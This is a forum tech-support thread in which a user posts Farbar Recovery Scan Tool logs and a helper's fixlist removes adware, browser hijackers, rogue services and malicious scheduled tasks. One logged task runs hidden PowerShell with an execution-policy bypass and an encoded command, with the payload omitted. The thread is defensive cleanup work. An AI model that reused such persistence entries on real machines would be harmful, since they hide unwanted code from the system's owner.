    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 0) (EnableLUA: 1)
    Windows Firewall is disabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKLM\...\StartupApproved\Run: => "BTMTrayAgent"
    HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
    HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
    HKLM\...\StartupApproved\Run32: => "BrowserAppCoreService"
    HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
    HKLM\...\StartupApproved\Run32: => "AvastUI.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_DF36D0F5D36790FB776196B8BD1F923B"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "Advanced SystemCare 8"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{3358EEB9-BF63-4965-BB07-5D87F8455602}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{24B1F9F1-7C3F-41AA-A61E-0509379FACD8}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{1C03B25A-7B58-455E-9B0B-E52E038D3A25}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{D776EB9A-C2A3-41DE-BC72-EFF3929CC640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{7D3C883A-AEBC-4F58-991D-26810ACBFD9A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{C81A2B31-CC74-4C27-A3FF-2BACD2DD09C3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{B861BA79-6EB3-4518-85BA-3C4F495C531B}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{8A96865D-D43C-464C-B756-000B93387C90}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse

    ==================== Restore Points =========================

    09-12-2015 13:27:06 Windows Update
    17-12-2015 20:05:00 Scheduled Checkpoint
    25-12-2015 18:53:48 Scheduled Checkpoint
    28-12-2015 23:12:21 PCAcceleratePro restore point
    29-12-2015 00:03:18 Restore Operation
    29-12-2015 16:00:38 Windows Modules Installer

    ==================== Faulty Device Manager Devices =============
     
  8. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (01/05/2016 04:51:26 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
    Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

    Error: (12/29/2015 05:15:24 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
    Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

    Error: (12/29/2015 05:06:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: svchost.exe_PNRPsvc, version: 6.3.9600.17415, time stamp: 0x54504177
    Faulting module name: ntdll.dll, version: 6.3.9600.18146, time stamp: 0x5650b9bb
    Exception code: 0xc0000005
    Fault offset: 0x000000000003dcfe
    Faulting process id: 0x16b8
    Faulting application start time: 0xsvchost.exe_PNRPsvc0
    Faulting application path: svchost.exe_PNRPsvc1
    Faulting module path: svchost.exe_PNRPsvc2
    Report Id: svchost.exe_PNRPsvc3
    Faulting package full name: svchost.exe_PNRPsvc4
    Faulting package-relative application ID: svchost.exe_PNRPsvc5

    Error: (12/29/2015 04:40:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: CHOCOYAUTJA)
    Description: Activation of app windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel failed with error: -2144927151 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (12/29/2015 04:27:29 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
    Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
    Exception code: 0x40000015
    Fault offset: 0x0008d6fd
    Faulting process id: 0x1374
    Faulting application start time: 0xmbam.exe0
    Faulting application path: mbam.exe1
    Faulting module path: mbam.exe2
    Report Id: mbam.exe3
    Faulting package full name: mbam.exe4
    Faulting package-relative application ID: mbam.exe5

    Error: (12/29/2015 04:26:35 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
    Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
    Exception code: 0x40000015
    Fault offset: 0x0008d6fd
    Faulting process id: 0x132c
    Faulting application start time: 0xmbam.exe0
    Faulting application path: mbam.exe1
    Faulting module path: mbam.exe2
    Report Id: mbam.exe3
    Faulting package full name: mbam.exe4
    Faulting package-relative application ID: mbam.exe5

    Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
    Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\Users\">.

    Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
    Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\ProgramData\Microsoft\Windows\Start Menu\">.

    Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
    Description: The index cannot be initialized.

    Details:
    The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)

    Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
    Description: The application cannot be initialized.

    Context: Windows Application

    Details:
    The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)


    System errors:
    =============
    Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (01/05/2016 04:50:12 PM) (Source: Server) (EventID: 2505) (User: )
    Description: The server could not bind to the transport \Device\NetBT_Tcpip_{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} because another computer on the network has the same name. The server could not start.

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The WajaNetEn Monitor service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Update Simple for You service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The SushiLeadsUpdaterService service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Network Protocols Adapter service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Advanced SystemCare Service 8 service failed to start due to the following error:
    %%2

    Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.


    CodeIntegrity:
    ===================================
    Date: 2016-01-05 17:09:53.308
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Robo\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2016-01-05 17:02:18.858
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2016-01-05 16:48:30.085
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 17:12:39.077
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:50:33.362
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:49:14.547
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:49:14.406
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:35:20.347
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 14:36:36.069
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 14:29:07.156
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
    Percentage of memory in use: 31%
    Total physical RAM: 6024.96 MB
    Available physical RAM: 4155.91 MB
    Total Virtual: 6984.96 MB
    Available Virtual: 4856.89 MB

    ==================== Drives ================================

    Drive c: (OS) (Fixed) (Total:920.08 GB) (Free:678.4 GB) NTFS
    Drive d: (TRAVELDRIVE) (Removable) (Total:7.2 GB) (Free:2.74 GB) FAT32
    Drive x: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.29 GB) NTFS
    Drive y: (PBR Image) (Fixed) (Total:10.05 GB) (Free:0.71 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: 5AA0DE3C)

    Partition: GPT.

    ========================================================
    Disk: 1 (MBR Code: Windows XP) (Size: 7.2 GB) (Disk ID: BF9CEC9C)
    Partition 1: (Not Active) - (Size=7.2 GB) - (Type=0C)

    ==================== End of Addition.txt ============================
     
  9. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    Uninstall the following unwanted programs:

    Pool Component
    Setup


    Download the attached fixlist.txt file and save it to the Desktop.
    NOTE. It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

    Run FRST(FRST64) and press the Fix button just once and wait.
    The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

    After restart see if you can connect.
     


  10. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Is it okay to keep the files on my USB drive or should I move them before the download?
     
  11. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    You should have all tools I ask you to use on your Desktop.
     
  12. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Okay I'll move them there, cause I'm using my PC for internet.
     
  13. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
    Ran by hersheychoco9 (2016-01-05 20:30:10) Run:1
    Running from D:\Utilities
    Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    C:\Users\hersheychoco9\AppData\Local\BrowserAir
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
    Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
    RemoveProxy:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
    FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
    FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
    FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
    FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
    FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
    C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml
    FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
    S2 NetprotAdp; no ImagePath
    S2 SushiLeadsUpdaterService; no ImagePath
    S2 Update Simple for You; no ImagePath
    S2 WajaNetEn Monitor; no ImagePath
    S3 WsDrvInst; no ImagePath
    S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
    S1 cherimoya; system32\drivers\cherimoya.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
    S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
    S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
    S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]
    2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
    2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
    2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
    2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
    2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
    2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
    2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
    2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
    2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
    2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp
    Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
    Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
    Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Seventh
    Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64-encoded command omitted]
    Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
    Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
    C:\Program Files (x86)\OLBPre
    Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Sixth
    Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
    C:\PROGRA~1\SHOPPE~1
    C:\PROGRA~1\SHOPPE~1\Osifch.bat
    Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION

    Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Genius


    *****************

    [5112] C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe => process closed successfully.
    C:\Users\hersheychoco9\AppData\Local\BrowserAir => moved successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ezvtum => value removed successfully
    C:\Users\hersheychoco9\AppData\Local\ezvtum.dll => moved successfully
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4d6de65c-5455-11e4-825b-a0886955d281}" => key removed successfully
    HKCR\CLSID\{4d6de65c-5455-11e4-825b-a0886955d281} => key not found.
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{65359199-e247-11e4-828b-a0886955d281}" => key removed successfully
    HKCR\CLSID\{65359199-e247-11e4-828b-a0886955d281} => key not found.
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully
    HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
    "HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully

    ========= RemoveProxy: =========

    "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
    HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
    HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


    ========= End of RemoveProxy: =========

    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found.
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    "HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6EB44F16-E471-4C00-BC7C-49D2839C991D}" => key removed successfully
    HKCR\CLSID\{6EB44F16-E471-4C00-BC7C-49D2839C991D} => key not found.
    Firefox "homepage" removed successfully
    Firefox SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)"); removed successfully
    Firefox DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)"); removed successfully
    Firefox "Keyword.URL" removed successfully
    Firefox "newtab" removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml => moved successfully
    "C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml" => not found.
    HKLM\Software\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
    HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\jid1-xNAj4KGyf5wyhg@jetpack => value removed successfully
    HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
    "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gihfmmedoddijgnhkgfgnkeohkpbipol" => key removed successfully
    NetprotAdp => service removed successfully
    SushiLeadsUpdaterService => service removed successfully
    Update Simple for You => service removed successfully
    WajaNetEn Monitor => service removed successfully
    WsDrvInst => service removed successfully
    BAPIDRV => service removed successfully
    cherimoya => service removed successfully
    EagleX64 => service removed successfully
    iscFlash => service removed successfully
    PCDSRVC{3B54B31B-D06B6431-06020200}_0 => service removed successfully
    X6va029 => service removed successfully
    {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64 => service removed successfully
    "C:\Users\hersheychoco9\AppData\Local\BrowserAir" => not found.
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean => moved successfully
    C:\Program Files (x86)\DailyPCClean => moved successfully
    C:\Users\hersheychoco9\Documents\DailyPCClean => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean => moved successfully
    C:\Program Files (x86)\Roboscan_IS_Free.exe => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log => moved successfully
    C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log => moved successfully
    "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll" => not found.
    C:\Users\hersheychoco9\AppData\Local\recently-used.xbel => moved successfully
    C:\Users\hersheychoco9\AppData\Local\uninstall.exe => moved successfully
    C:\ProgramData\DP45977C.lfl => moved successfully
    C:\ProgramData\tempimage.bmp => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
    C:\Windows\System32\Tasks\Pool Component => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component" => key removed successfully
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
